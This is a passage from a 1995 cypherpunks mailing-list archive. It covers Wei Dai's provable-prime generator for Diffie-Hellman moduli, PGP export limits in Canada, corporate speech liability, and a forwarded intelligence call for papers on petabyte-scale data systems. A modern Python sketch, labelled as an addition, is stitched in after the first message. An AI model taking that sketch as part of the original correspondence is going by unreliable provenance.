Message-ID: <Pine.SUN.3.91.951123024142.12404A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Several days ago someone (I forgot who he was) asked about code for 
primality tests.  I just implemented an algorithm to generate random 
provable primes that is only about 50% slower than generating probable 
primes.  It will be in the next version of Crypto++, but I've attached 
code for the main function in case anyone is interested in the 
algorithm.  Full description can be found in "Fast Generation of Prime 
Numbers and Secure Public-Key Cryptographic Parameters" by U.M. Maurer in 
Journal of Cryptology, Volume 8 Number 3, 1995.  The paper also describes 
a more complicated algorithm that produces primes with a more uniform 
distribution.

There was discussion some days ago about generating strong primes 
for DH exchange moduli.  Eric Young reported that he spent tens of hours 
of CPU time to generate a 4096 bit prime p such that (p-1)/2 is also 
prime.  However, there is really no reason why DH exchange moduli must be of 
the form 2q+1 where q is a prime.  It should be sufficient that they are 
of the form rq+1, where q is a large enough prime (say more than 256 
bits).  The following algorithm generates a provable prime p=2rq+1, where q 
is a prime with at least half the length of p.

bignum ProvablePrime(RandomNumberGenerator &rng, unsigned int bits)
{
	const unsigned smallPrimeBound = 29, c_opt=10;
	bignum p;

	BuildPrimeTable();
	if (bits < smallPrimeBound)
	{
		// Small case: draw odd candidates and retry while trial division
		// up to about sqrt(p) finds a factor.
		do
			p.Randomize(rng, bignum::Power2(bits-1), bignum::Power2(bits)-1, ODD);
		while (TrialDivision(p, 1 << ((bits+1)/2)));
	}
	else
	{
		// Pick the size of q relative to p, between 1/2 and 1, leaving
		// at least `margin` bits for the random cofactor.
		const unsigned margin = bits > 50 ? 20 : (bits-10)/2;
		double relativeSize;
		do
			relativeSize = pow(2.0, double(rng.GetLong())/0xffffffff - 1);
		while (bits * relativeSize >= bits - margin);
		
		bignum a,b;
		// Recursively generate the provable prime q.
		bignum q = ProvablePrime(rng, unsigned(bits*relativeSize));
		bignum I = bignum::Power2(bits-2)/q;
		bignum I2 = I << 1;
		unsigned int trialDivisorBound = (unsigned int)min(
			(unsigned long)primeTable[primeTableSize-1],
			(unsigned long)bits*bits/c_opt);
		boolean success = FALSE;
		do
		{
			// Candidate p = 2*r*q + 1 with r random in [I, 2I].
			p.Randomize(rng, I, I2, ANY);
			p *= q; p <<= 1; ++p;
			if (!TrialDivision(p, trialDivisorBound))
			{
				// Pocklington test with a random base a: b = a^((p-1)/q) mod p;
				// require gcd(b-1, p) == 1 and b^q = a^(p-1) == 1 (mod p).
				// This proves p prime provided (2q+1)^2 > p.
				a.Randomize(rng, 2, p-1, ANY);
				b = a.ExponentiateMod((p-1)/q, p);
				success = (Gcd(b-1, p) == 1) && (b.ExponentiateMod(q, p) == 1);
			}
		}
		while (!success);
	}
	return p;
}
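
An added Python sketch of the recursive construction described in the message above (not Wei Dai's Crypto++ code; Python is used because its integers are arbitrary precision). All function names are this example's own. It rounds q's length up to at least half of p's, which guarantees (2q+1)^2 > p, and it returns the chain of (p, q, a) witnesses so that a second function can re-check the proof without trusting the generator.

```python
import math
import secrets

SMALL_BITS = 29            # below this size, trial division alone is the proof
SMALL_PRIMES = [n for n in range(3, 2000, 2)
                if all(n % d for d in range(3, int(n ** 0.5) + 1, 2))]


def is_prime_by_trial_division(n):
    """Deterministic proof for small n: try every odd divisor up to sqrt(n)."""
    if n < 2 or n % 2 == 0:
        return n == 2
    d = 3
    while d * d <= n:
        if n % d == 0:
            return False
        d += 2
    return True


def pocklington_step_ok(p, q, a):
    """One certificate step: given q already proven prime, prove p = 2rq + 1."""
    if q % 2 == 0 or (p - 1) % (2 * q) != 0:
        return False
    if (2 * q + 1) ** 2 <= p:      # q too small: the conditions prove nothing
        return False
    b = pow(a, (p - 1) // q, p)
    # b^q = a^(p-1) must be 1, and b - 1 must share no factor with p.
    return pow(b, q, p) == 1 and math.gcd(b - 1, p) == 1


def provable_prime(bits, rng=None):
    """Return (p, cert). p has exactly `bits` bits; cert lists the
    (p_i, q_i, a_i) Pocklington steps, smallest first, ending at p."""
    rng = rng or secrets.SystemRandom()
    if bits < 2:
        raise ValueError("need at least 2 bits")
    if bits < SMALL_BITS:
        while True:
            p = rng.randrange(1 << (bits - 1), 1 << bits) | 1
            if is_prime_by_trial_division(p):
                return p, []
    margin = 20 if bits > 50 else (bits - 10) // 2
    while True:                    # relative size of q, drawn from [0.5, 1)
        rel = 2.0 ** (rng.random() - 1)
        if bits * rel < bits - margin:
            break
    q_bits = max(int(bits * rel), (bits + 1) // 2)   # at least half of p
    q, cert = provable_prime(q_bits, rng)
    lo = (1 << (bits - 2)) // q
    while True:
        r = rng.randint(lo + 1, 2 * lo)   # keeps p inside [2^(bits-1), 2^bits)
        p = 2 * r * q + 1
        if any(p % s == 0 for s in SMALL_PRIMES):
            continue                      # cheap filter before the modexp
        a = rng.randint(2, p - 2)
        if pocklington_step_ok(p, q, a):
            return p, cert + [(p, q, a)]


def verify_certificate(p, cert):
    """Re-check a claimed prime from its certificate alone."""
    if not cert:
        return p < (1 << SMALL_BITS) and is_prime_by_trial_division(p)
    known = cert[0][1]             # the chain must start at a small prime
    if known >= (1 << SMALL_BITS) or not is_prime_by_trial_division(known):
        return False
    for n, q, a in cert:
        if q != known or not pocklington_step_ok(n, q, a):
            return False
        known = n
    return known == p


if __name__ == "__main__":
    p, cert = provable_prime(512)
    print("p =", hex(p))
    print("q bits:", cert[-1][1].bit_length(), "steps:", len(cert))
    print("certificate verifies:", verify_certificate(p, cert))
```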





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Thu, 23 Nov 95 04:39:11 PST
To: Still <x93ojg@juliet.stfx.ca>
Subject: Re: PGP in Canada
In-Reply-To: <Pine.A32.3.91.951122213807.121948C@juliet.stfx.ca>
Message-ID: <Pine.OSF.3.91.951123073901.6893B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


You can try to get PGP from the MIT site but it may not allow you to do 
so if it does not recognize your address as being Canadian. I tried to 
get PGP-Phone and it told me that it did not think that I was a Canadian. 
I wrote to the administrator but have never received a reply. I checked 
about a week ago and I still could not get the file.
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 23 Nov 95 06:00:43 PST
To: karlton@netscape.com (Phil Karlton)
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <30B3CE64.6BF2@netscape.com>
Message-ID: <9511231357.AA10766@all.net>
MIME-Version: 1.0
Content-Type: text


> Alice (or someone representing themselves as Alice) said:
> 
> > What I'm trying to say is that if someone posts from watson.ibm.com,
> > and IF they are talking about OS/2, we will not accept that they are
> > not speaking independently of the knowledge they have garnered from
> > watson.
> 
> And that is understandable.
> 
> > In the same way, someone who writes from Netscape.com or AT&T, or Sun
> > and tries to disclaim that they are speaking for the company, when
> > they step out as an employee of a company is deluding themselves.
> 
> This is a complete non sequitur. See if you can follow this: only those
> authorized by the company to speak for the company are authorized to speak
> for the company.

This is not correct, at least according to legal precedent.  If someone who
is from Sun represents themselves as being from Sun (i.e., a Sun.Com email
address in their signature line), then when they speak (or email) about Sun,
its products, its policies, etc., they represent Sun.

> There is a genuine difference between a corporate officer saying
> 
> 	The Amalgamated Widget corporate policy on strong crypto is ...
> 
> and some engineer from Amalgamated Widget saying
> 
> 	My private opinion on strong crypto is ...

There is indeed a difference, but it's not as big as you might seem to
think.  Even more importantly, there is a difference between the person
from Amalgamated Widget speaking on strong crypto and the person from
Sun speaking on Java.

> The consequence of every statement by every employee being taken as
> company policy is that every employee (except for public relations) will
> be prohibited from contributing to any public forum or even answering
> apparently innocuous questions on the net. This would not be a desirable
> outcome.

In fact, employees represent the company any time they use company
names, symbols, stationery, return addresses, etc.

If the Netscape legal staff and corporate security board haven't made
this clear to management and employees, that's pretty bad.  If the
officers of Netscape haven't taken appropriate policy measures to notify
employees of this potential liability (it appears that at least they
haven't notified Philip), then negative consequences could result in
personal liability to the officers (a shareholder lawsuit would be the
most common cause of such liability).  As a Netscape employee, you
should immediately point this out to the corporate person you report to,
and do so in writing.

This sort of lapse is a strong indicator that inadequate IT audit has
been done in Netscape.  In a comprehensive IT audit, such policy lapses
should be identified quickly and changes in corporate policies should
follow very closely. 

> Still speaking for myself,

You are still speaking for Netscape, but hopefully after reading this
message, you and your company will realize it.

> PK
> --
> Philip L. Karlton		karlton@netscape.com
> Principal Curmudgeon		http://www.netscape.com/people/karlton
> Netscape Communications

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Thu, 23 Nov 95 07:01:49 PST
To: cypherpunks@toad.com
Subject: Re: PGP in Canada
In-Reply-To: <Pine.OSF.3.91.951123073901.6893B-100000@nic.wat.hookup.net>
Message-ID: <Pine.A32.3.91.951123110336.108308A-100000@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 Nov 1995, Tim Philp wrote:

> You can try to get PGP from the MIT site but it may not allow you to do 
> so if it does not recognize your address as being Canadian. I tried to 
> get PGP-Phone and it told me that it did not think that I was a Canadian. 
> I wrote to the administrator but have never received a reply. I checked 
> about a week ago and I still could not get the file.
> Tim Philp
> 
I already downloaded a copy last week but I deleted it because I didn't 
know if it was legal to use it and my Sys admin would probably revoke my 
account if it was illegal.  I was talking to him and he told me that if I 
can prove that it is legal he will let me use it.
 

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 23 Nov 95 06:44:09 PST
To: cypherpunks@toad.com
Subject: Intelligence Community Massive Digital Data Systems Initiative
Message-ID: <199511231246.NAA00407@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Below is some information about the Intelligence Community Massive
Digital Data Systems Initiative.

Summary:
 - new data 2 - 5 terabytes (10^12 bytes) per day
 - total size about 20 petabytes (20 * 10^15 bytes)
 - 300 terabytes on-line, the rest accessible in a few minutes
 - funding (for the research initiative, not for the final system): 
   3-5 million USD per year estimated for investments

Now, how much is 2 - 5 terabytes per day?
  - 20 - 50.000.000 jpeg images (100kB/image, relatively high-quality) per day
  - 20 - 50.000.000 minutes of GSM-quality phone intercepts per day
  - 1.000.000 - 2.500.000 minutes of compressed (256kbit/sec) video per day
  - 1.000.000.000 - 3.000.000.000 e-mail messages per day
  - you can continue the list; most available data sets turn out to be
    much smaller

How much is 20 petabytes?  Assuming you want to collect
information about 100.000.000 people worldwide, this makes 200
megabytes per person (on the average for each of those 100 million
people).

200 megabytes per person on the average is quite a lot, since for many
of those people you probably don't have all that much data.  Maybe 90%
of the data for 10% of the people?  

(Of course, in a database like this you might also have a lot of data
like aerial imagery, satellite imagery, economical information,
etc., so it is a little exaggerated to talk about all of it being on
individual people.)

The full text is below.

Crypto relevance?  Makes you think whether you should protect your data.

    Tatu

From: dbowner@cs.wisc.edu ( Dbowner)
To: bal@mitre.org, mike@nobozo.CS.Berkeley.EDU, shosani@csr.lbl.gov,
        gray@sfbay.enet.dec.com, livny@cs.wisc.edu, ragrawal@almaden.ibm.com,
        manola@gte.com, heiler@gte.com, dayal@hplabs.hpl.hp.com,
        shan@hplabs.hpl.hp.com, toby@almaden.ibm.com, reiner@ksr.com,
        jag@allegra.att.com, randy@allspice.berkeley.edu, mcleod@vaxa.isi.edu,
        nick@MIMSY.CS.UMD.EDU, ake@purdue.edu, laney@ccr-p.ida.org,
        darema@watson.ibm.com, grossman@math.uic.edu, dbusa@cs.wisc.edu,
        metadata@llnl.gov, jmaitan@mosaic.uncc.edu, whm@thumper.bellcore.com
Cc: susan@mitre.org, connie@mitre.org
Subject: Call For Papers MDDS
Date: Thu, 18 Nov 93 11:08:03 EST
Resent-To: dbworld-people@cs.wisc.edu
Comments: IF YOU REPLY TO THIS MESSAGE, BE SURE TO EDIT THE to: AND cc: LISTS.
 The dbworld alias reaches many people, and should only be used for
 messages of general interest to the database community.  Mail sent
 to dbedu goes to the subset of addresses with a .edu suffix; mail
 sent to dbusa goes to the subset of US addresses.  Please use
 the smaller lists when appropriate.  Requests to
 get on or off dbworld should go to dbworld-request@cs.wisc.edu.
Reply-To: (Susan L. Hanlon) <susan@linus.mitre.org>
Resent-Reply-To: (Susan L. Hanlon) <susan@linus.mitre.org>



									3 November 1993

Dear Colleague:

Subject:  Call for Abstracts for Massive Digital Data Systems



	Future intelligence systems must effectively manage massive amounts of digital
data (i.e., multi-terabytes or greater).  Issues such as scalability, design,
and integration need to be addressed to realize a wide spectrum of intelligence
systems ranging from centralized terabyte and petabyte systems comprised of many
large objects (e.g., images) to distributed heterogeneous databases that contain
many small and large objects (e.g., text).  The Community Management Staff's
Massive Digital Data Systems (MDDS) Working Group on behalf of the intelligence
community, is sponsoring a two day invitation-only unclassified workshop on the
data management of massive digital data systems with government, industry, and
academia.

	The workshop will be held on the 1st and 2nd of February 1994 in Reston,
Virginia.  The objective of the workshop is to make industry and academia aware
of intelligence community needs, stimulate discussion of the technical issues
and possible solutions, and identify potential research efforts that warrant
further investigation for possible government funding.  The amount of funding
estimated for investments is three to five million dollars per year over the
next 2-3 years.

	Last July, a one-day, classified, government-only workshop was held to
characterize the magnitude of the problem and identify the major challenges. 
The needs, issues, and in some cases, lessons learned, were presented for
different data types including Imagery, Text, Voice, Video, and Multi-media. 
Enclosure 1, "Massive Digital Data System Issues", is an unclassified
description of the consolidated challenges.

	The Massive Digital Data Systems Working Group is soliciting one-page abstracts
related to the issues of the data management of massive digital systems
including (but not limited to) scalability, architecture and data models, and
database management functions.  The focus of the abstract should be on potential
solutions for the longer term research challenges (i.e., 5-10 years out) that
must be addressed today in order to effectively manage data of massive
proportions in the future.  The solutions need not be limited to proven
approaches today but can foster new approaches and paradigms.  Issues relating
to the storage media and analysis tools, while important to the intelligence
community, are not within the scope of the workshop.  Selection for attendance
will be based upon technical relevance, clarity, and quality of the proposed
solution.


	Each one-page abstract should follow the abstract format enclosed (Enclosure
2).  All submissions must be UNCLASSIFIED.  To allow enough time for proper
evaluation of each abstract, the deadline for submission is 01 December 1993. 
You will be notified of acceptance to attend by 17 December 1993.  Abstracts
should be forwarded to one of the following:

	Jackie Booth, P.O. Box 9146, Rosslyn Station, Arlington, VA   22219
	Jackie Booth, ORD/SETA, fax number (703) 351-2629
	boothj@mcl.saic.com (Internet)

	Please pass this call for abstracts on to other colleagues that are working on
solutions in this area.

	Sincerely,



	Dr. David Charvonia
	Director, Advanced Technology Office
	Community Management Staff

Enclosures:
  1.  Massive Digital Data Systems Issues
  2.  Abstract Format
	
Enclosure 2
ABSTRACT FORMAT

Title:


Author(s):

Organization/Affiliation:

Address:

Phone:					FAX:


Description:


















Status:  (Research, Prototype, Operational)


Scope:  (Size of effort in terms of dollars and/or staff months;  Size of system
in terms of amount of data, number of databases, nodes, users, etc.)


Customer:  (if applicable)


Operational Use:  (if applicable)


********************************************************************
Forward to one of the following:
	Jackie Booth, P.O. Box 9146, Rosslyn Station, Arlington, VA   22219
	Jackie Booth, ORD/SETA, fax number (703) 351-2629
	boothj@mcl.saic.com (Internet)

-------------------------------------------------------------------
MASSIVE DIGITAL DATA SYSTEMS ISSUES


EXECUTIVE SUMMARY

Future intelligence systems must effectively manage massive amounts of digital
data (i.e., multi-terabytes or greater). Issues such as scalability, design, and
integration need to be addressed to realize a wide spectrum of intelligence
systems ranging from centralized terabyte and petabyte systems comprising many
large objects (e.g. images) to distributed heterogeneous databases that contain
many small and large objects (e.g. text). Consequently, Massive Digital Data
Systems (MDDS) are needed to store, retrieve, and manage this data for the
intelligence community (IC). While several advances have been made in database
management technology, the complexity and the size of the database as well as
the unique needs of the IC require the development of novel approaches. This
paper identifies a set of data management issues for MDDS. In particular,
discussions of the scalability issues, architectural and data modeling issues,
and functional issues are given. The architectures for MDDS could be
centralized, distributed, parallel, or federated. The functions of MDDS include
query processing, browsing, transaction management, metadata management,
multimedia data processing, integrity maintenance, and realtime data processing.
Representing complex data structures, developing appropriate architectures,
indexing multimedia data, optimizing queries, maintaining caches, minimizing
secondary storage access and communications costs, enforcing integrity
constraints, meeting realtime constraints, enforcing concurrency control,
recovery, and backup mechanisms, and integrating heterogeneous schemas, are some
of the complex tasks for massive database management. The issues identified in
this paper will provide the basis for stimulating efforts in massive database
management for the IC.

1.0  INTRODUCTION	
1.1  The Challenge
The IC is challenged to store, retrieve, and manage massive amounts of digital
information. Massive Digital Data Systems (MDDS), which range from centralized
terabyte and petabyte systems containing many large objects (e.g., images) to
distributed heterogeneous databases that contain many small and large objects
(e.g., open source), are needed to manage this information. Although
technologies for storage, processing, and transmission are rapidly advancing to
support centralized and distributed database applications, more research is
still needed to handle massive databases efficiently. This paper describes
issues on data management for MDDS including scalability, architecture, data
models, and database management functions. Issues related to storage media,
analysis tools, and security while important to the IC are not within the scope
of this paper. 

The key set of data management issues for MDDS include:  

	Developing architectures for managing massive databases
	Utilizing data models for representing the complex data structures
	Formulating and optimizing queries
	Developing techniques for concurrency control and recovery
	Integrating heterogeneous schemas
	Meeting timing constraints for queries and transactions
	Indexing multimedia data
	Maintaining caches and minimizing secondary storage access and communications
costs
	Enforcing integrity constraints.

1.2  Background
The IC provides analysis on current intelligence priorities for policy makers
based upon new and historical data collected from intelligence sources and open
sources (e.g., news wire services, magazines). Not only are activities becoming
more complex, but changing demands require that the IC process different types
as well as larger volumes of data. Factors contributing to the increase in
volume include continuing improvements in collection capabilities, more
worldwide information, and open sources. At the same time, the IC is faced with
decreasing resources, less time to respond, shifting priorities, and wider
variety of interests. Consequently, the IC is taking a proactive role in
stimulating research in the efficient management of massive databases and
ensuring that IC requirements can be incorporated or adapted into commercial
products. Because the challenges are not unique to any one agency, the Community
Management Staff (CMS) has commissioned a Massive Digital Data Systems Working
Group to address the needs and to identify and evaluate possible solutions.

1.3  Assumptions and Project Requirements
Future intelligence systems must provide a full suite of services for gathering,
storing, processing, integrating, retrieving, distributing, manipulating,
sharing and presenting intelligence data. The information to be shared is
massive including multimedia data such as documents, graphics, video, and audio.
  It is desired that the systems be adapted to handle new data types.  

The goal is to be able to retain the data for potential future analysis in a
cost effective manner. The more relevant data would remain on-line, say for 5
years, organized with the most relevant data accessible in the least amount of
time. It is expected that 2 to 5 terabytes of new data has to be processed each
day.  Thus, the total size of the database (both on-line and off-line) could be
as large as 20 petabytes with about 300 terabytes of data stored on-line. It is
assumed that storage devices (primary, secondary, and even tertiary) for the
large multimedia databases as well as data pathways with the required capacity
will exist. The access times are about 5 seconds for the data less than a week
old, about 30 seconds for data under two months old, and on the order of minutes
for data up to 10 years old. 

2.0  SCALABILITY ISSUES
A particular data management approach can be scaled to manage larger and larger
databases. That is, a database can often sustain a certain amount of growth
before it becomes too large for a particular approach. For example, more memory,
storage, and processors could be added, a new hardware platform or an operating
system could be adopted, or a different microprocessor could be used (e.g. using
a 32 bit microprocessor instead of a 16 bit microprocessor). Once the size of
the database has achieved its limit with a particular approach, then a new
approach is required. This new approach could be a new architecture, a new data
model, or new algorithms to implement one or more of the functions of the
database management system (DBMS), or a combination of these features.
Discussions of these three features are given below. 

 	Architectures:  The type of architecture impacts the size and response time
of the DBMS.  
	Centralized approaches are being migrated to distributed and parallel
approaches to handle large databases.  Some architectures such as the shared
nothing parallel architectures are scalable to thousands of processors, but will
have multiprocessor communication issues.  Current approaches need to be
assessed to determine their scalability limits.  New approaches may be required
for handling massive databases.


 	Data Models:  Data models which support a rich set of constructs are desired
for next generation database applications.  However, the search and access time
of the DBMS would depend on the data model used. For example DBMSs which support
complex data structures use large caches, access data through pointers, and work
well with large main memory in general, while DBMSs based on simpler data models
maintain index files and provide associative access to the secondary storage.
The limits of these models within the context of massive databases need to be
understood.  New or modified approaches may be required.

	DBMS Functions:  The techniques to implement the DBMS functions have to be
modified to handle massive databases.  For example, as the size of the database
increases, new approaches for  query optimization, concurrency control,
recovery, and backup, access methods and indexing, and metadata management will
be required.  

The architectural, data modeling, and functional issues that need to be
addressed for MDDS will be elaborated in sections 3 and 4. 

3.0  ARCHITECTURAL AND DATA MODELING ISSUES
3.1  Architectural Issues
This section describes some of the architectural issues that need to be
addressed for an MDDS. In the case of the centralized approach, a major issue is
managing the data transfer between the main memory and secondary storage. One
could expect the data that is a week old to be cached in main memory, the data
that is less than two months old to be in secondary memory, and data that is a
few years old to be in tertiary storage. In designing the data management
techniques (such as those for querying, updating, and transaction processing),
data transfer between the main and secondary memories needs to be minimized.
There is also a need to reflect patterns of use (e.g., in migrating items to
lower/higher levels of storage hierarchy). Another issue is the relationship
between the size of the cache and the size of the database. 

When one migrates to distributed and parallel architectures, a goal is to
maintain a larger number of smaller databases. It is assumed that processors and
storage devices are available. A  major issue is the communication between the
processors. In designing the data management mechanisms, an objective would be
to minimize the communication between the different processors. For example, in
the case of a join operation between several relations in a relational DBMS,
each fragmented across multiple sites, an issue is whether to merge all of the
fragments of a relation and then perform the join operation or whether to do
several join operations between the fragments and then merge the results to form
the final result. Different configurations of the distributed and parallel
architectures also need to be examined. For example, there could be
point-to-point communication between every processor, or the processors could be
arranged in clusters and communication between clusters is carried out by
designated processors. Another issue in migrating to a distributed architecture
is handling data distribution. For example, if the data model is relational,
then how could one fragment the various relations across the different sites? 
If the relations are to be replicated for availability, then how could
consistency of the replicated copies be maintained?  Another issue is what data
could be cached within the distributed system, how could data be cached, and for
how long could the cache be maintained. 
   
While distributed and parallel architectures are being investigated for managing
massive databases, federated architectures are needed to integrate the existing
different and disparate databases.  The existing databases could be massive
centralized databases or they could be distributed databases. Furthermore, they
could be relational, object-oriented and even legacy systems.  An issue in
heterogeneous database integration is developing standard uniform interfaces
which can be accessed via an integration backplane.  If the environment is a
federated one, where the nodes have some autonomy, then a major issue is the
ability to share each other's data while maintaining the autonomy of the
individual DBMSs. This is hard because cooperation and autonomy are conflicting
goals.  The techniques to implement the DBMS functions for data retrieval,
updates, and maintaining integrity have to be adapted or new approaches have to
be developed for federated architectures.  

Extensible architectures are also being investigated for massive databases. 
With such architectures, DBMSs are extended with inferencing modules which make
deductions from data already in the database.  This way, one need not store all
of the data in the database explicitly. Instead, appropriate inference rules are
used to make deductions and derive new data.  This way the size of the database
is reduced.  The issues include determining what data is to be stored in the
database and what data is to be stored in the knowledge base manipulated by the
inferencing module, effective management of the knowledge base, and adapting the
functions of the DBMS to handle extensible architectures.  
   
3.2  Data Modeling Issues

In selecting an appropriate data model for massive databases, several issues
must be considered. Providing a data model powerful enough to support the
representation of complex data must be addressed.  For example, with a
multimedia document, one may need to devise a scheme to represent the entire
document in such a way to facilitate browsing and updating. Since the age of a
document could be used to move it between different storage media, it is
desirable for the data model to support the representation of temporal
constructs. The representation of different types of multimedia devices and
grouping of documents are also important considerations in selecting a data
model. The data model chosen has an impact on the techniques to implement the
functions of a DBMS. For example, DBMSs based on some models use associative
access while those based on some other models use pointer traversal. 

In migrating to a distributed/parallel architecture, if it is assumed that the
data model is the same for all databases, then a major issue is whether it is
feasible to provide a conceptual view of the entire massive database to the
user. However, in the case of a federated architecture, since it is generally
assumed that the individual data models are different, several additional issues
need to be considered. For example, could the users have a global view of the
massive database or could they have their own individual views?  In either case,
it would be desirable for the users to access the distributed databases in a
transparent manner. If a global view is enforced, the query processor could
transform the queries on the global view to the views of the individual
databases. If each user has his own view, then the query processor could
transform the user's view into the views of the individual databases. Other
issues for a federated architecture include the representation of the individual
schemas (which describe the data in the databases), determining which schemas to
be exported to the federation, filtering appropriate information from the
schemas at different echelons, integrating the schemas to provide a global view,
and generating the external schemas for the users. In integrating the different
schemas, the semantic and syntactic inconsistencies between the different
representations need to be resolved. For example, the address in database A
could include the house number and the street name while in database B it could
just be the city and the state. 

4.0  FUNCTIONAL ISSUES   
The techniques to implement the functions of MDDS will be impacted by the
architectures and data models as well as requirements such as integrity and
multimedia data processing. Therefore some of the functional issues have already
been addressed in section 3. This section provides a more detailed overview of
the functional issues.  First the basic functional issues for MDDS (such as
issues on query processing and transaction management) will be discussed and
then the impact of maintaining integrity, realtime processing, and multimedia
data processing will be given. 

4.1 Querying, Browsing, and Filtering
The query operation is a means by which users can retrieve data from the
database. Closely related is the browsing operation where users traverse various
links and subsequently scan multiple documents either sequentially or
concurrently. To determine if the new information warrants viewing by the
analyst and/or to enforce access control, automatic filtering of the data is
needed. Some issues in query management for massive databases are using an
appropriate language for specifying queries and developing optimization
techniques for the various operations involved in a query. The goals are to make
it easier for users to formulate queries and also to minimize data transfer
between primary and secondary storage. 

Query management in a federated environment must provide the means for
formulating and processing queries seamlessly and efficiently. This involves
designing an interface for formulating queries over multiple sources. There is a
need for query optimization, in order to prevent degradation in performance in
the distributed system. In addition to determining the execution strategy for a
query, query optimization techniques could also determine which portion of the
query processing is to remain under direct and unshared control at the analyst's
workstation. Methods need to be developed for browsing the integrated
information space and for displaying results obtained from multiple sources.
Finally, data from local databases have to be filtered according to the various
constraints (such as security constraints) and enforced before sending it to the
remote sites. 

Query processing algorithms in an extensible architecture need to incorporate
inferencing techniques.  The usefulness of inferencing techniques for
intelligence applications can best be illustrated with a simple example. Suppose
parts A, B, C and D are needed to build a nuclear weapon, and also suppose that
the following constraint is enforced:  "if three of the four parts are shipped
to country X, then the fourth part should not be shipped to X."  Therefore, if
parts A, B, and C are already shipped to X and there is a request from X for
part D, then the inferencing module will determine that this part cannot be
shipped.  An issue in developing an inference module is determining the
deduction strategies to be implemented. These strategies could be just logical
deduction or could include more sophisticated techniques such as reasoning under
uncertainty and inductive inference. With most inference strategies one runs
into the problem of an infinite loop; therefore appropriate time limits must be
enforced to control the computation.

In general, the issues to be addressed in query management will include:

	Query optimization.
	Handling data distribution
	Making intelligent deductions 
	Uniform vs. user-tailored query language 

4.2  Update Transaction Processing
Multi-user updates are supported in general to improve performance. The goal is
for multiple users to be able to update the database concurrently. A major issue
here is ensuring that the consistency of the database is maintained. The
techniques that ensure consistency are concurrency control techniques. Often
update requests are issued as part of transactions. A transaction is a program
unit that must be executed in its entirety or not executed at all. Therefore, if
the transaction aborts due to some error, such as system failure, then the
database is recovered to a consistent state.

Several concurrency control algorithms have been designed and developed for
different environments. Some algorithms are suitable for short transactions in
business processing applications and some others are suitable for long
transactions which often involve multimedia data. To handle long transactions
efficiently, weaker forms of consistency conditions have been formulated.
Several recovery techniques have also been developed to maintain the consistency
of the database. If the transaction is long, then the log files that record the
actions of the transaction may be quite large. Efficient management of log files
becomes an issue. As the size of the database increases, a transaction would
take a longer time for execution. Adapting the concurrency control and recovery
algorithms or developing new algorithms to work with the massive databases
becomes an issue.  

Update transaction processing gets more complicated in distributed and federated
environments. For example, if replicated copies are to be maintained, then
making them consistent will have an impact on the performance. Therefore, an
issue here is whether to maintain strict consistency or select a subset of the
copies and make them consistent immediately so that the remaining copies could
be updated at a later time. One of the problems with a federated environment is
the different concurrency control and recovery algorithms used by the individual
DBMSs. In such a situation synchronizing the different techniques becomes a
major issue. 

4.3  Access Methods and Index Strategies
To enhance the performance of query and update algorithms, efficient access
methods and index strategies have to be enforced. That is, in generating
strategies for executing query and update requests, the access methods and index
strategies that are used need to be taken into consideration. The access methods
used to access the database would depend on the indexing methods. Therefore
creating and maintaining appropriate index files is a major issue in a DBMS.
Usually, the size of the index file grows with the size of the database. In some
cases, the index file could be larger than the database itself. Some of the
issues include determining what type of indexes are to be maintained for massive
databases.  Is it feasible to have dense indexing where there is an entry in the
index file for every entry in the database?  If so, the index file could have as
many entries as there are in the database. Is it better to have sparse indexing
so that the size of the index file could be reduced?  If so, is there a strategy
to determine which entries in the database are to be indexed?  For multimedia
data, indexing could be done not only by content but by type, language, context
(i.e., where, how, when it was collected), author (i.e., for documents), and
speaker (i.e., for voice). The challenge is how to index and to provide improved
mechanisms for extraction of the information used for indexing.   For example,
the ability to automatically index voice is desired.  Additionally, the ability
to index voice and video (with associated voice) with their transcriptions
(i.e., time alignment) is necessary.

Various storage structures have been proposed. These include B-Trees and
Parent-Child links. The question is, are these methods suitable for massive
databases? Voice and video data require segmentation into logical units for
storage and access. Additionally, the ability for automatic segmentation within
documents of embedded drawings and figures and their interpretation (via
seamless integration with image handling tools) is needed. Other challenges
include providing user transparent hierarchical storage management (i.e., store
the most relevant or most recent information on the fastest media) and the
ability to reposition data in the storage hierarchy based upon changing
importance, migration mechanisms for transferring information to newer storage
media or a new architecture (failure to do so can lead to exorbitant costs to
maintain discontinued storage media drives or inaccessible data), archival
technology/policies for older/less important information, and synchronization of
information distributed across multiple repositories.

Compression can decrease the costs of storage and transmission especially for
the larger objects such as vector and raster spatial data types, voice, imagery,
and video. Real-time conversion of heterogeneous voice and video compression and
file formats in network broadcasts/multicasts is an issue.  For imagery, a
capability such as pyramidal decomposition for providing reduced resolution
images is needed for browsing purposes.

4.4  Managing the Metadata
The metadata includes a description of the data in the database (also referred
to as the schemas), the index strategies and access methods used, the integrity
mechanisms enforced, and other information for administrative purposes. 
Metadata management functions include representing, querying, and updating the
metadata.  In massive databases, if the metadatabase is much smaller than the
database, then the traditional techniques could be applied to manage the
metadata. If the metadatabase becomes massive, then new techniques need to be
developed. An issue here is whether the techniques for massive databases could
be applied for massive metadatabases also. Support for schema evolution is
